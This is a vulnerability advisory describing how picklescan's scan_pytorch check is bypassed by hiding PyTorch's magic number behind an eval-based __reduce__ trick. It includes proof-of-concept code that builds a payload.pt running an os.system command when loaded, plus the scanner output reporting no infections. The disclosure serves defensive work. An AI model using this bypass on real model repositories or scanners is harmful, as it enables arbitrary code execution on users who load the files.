Lack of data validation In picklescan

Description

Picklescan (scan_pytorch) Bypass via dynamic eval MAGIC_NUMBER

Summary

This is a scanning bypass to scan_pytorch function in picklescan. As we can see in the implementation of get_magic_number() that uses pickletools.genops(data) to get the magic_number with the condition opcode.name includes INT or LONG, but the PyTorch's implemtation simply uses pickle_module.load() to get this magic_number. For this implementation difference, we then can embed the magic_code into the PyTorch file via dynamic eval on the \_\_reduce\_\_ trick, which can make the pickletools.genops(data) cannot get the magic_code in INT or LONG type, but the pickle_module.load() can still return the same magic_code, eading to a bypass.

PoC

Attack Step 1

we can edit the source code of the function _legacy_save() as follows:

    class payload:
        def __reduce__(self):
            return (eval, ('MAGIC_NUMBER',))

    pickle_module.dump(payload(), f, protocol=pickle_protocol)

Attack Step 2

with the modified version of PyTorch, we run the following PoC to generate the payload.pt:

import torch 

class payload:
    def __reduce__(self):
        return (__import__('os').system, ('touch /tmp/hacked',))

torch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False)

Picklescan result

ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356
----------- SCAN SUMMARY -----------
Scanned files: 0
Infected files: 0
Dangerous globals: 0

Victim Step

import torch
torch.load('./payload.pt', weights_only=False)

then you can find the illegal file /tmp/hacked created in your local system.

Impact

Craft malicious PyTorch payloads to bypass picklescan, then recall ACE/RCE.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions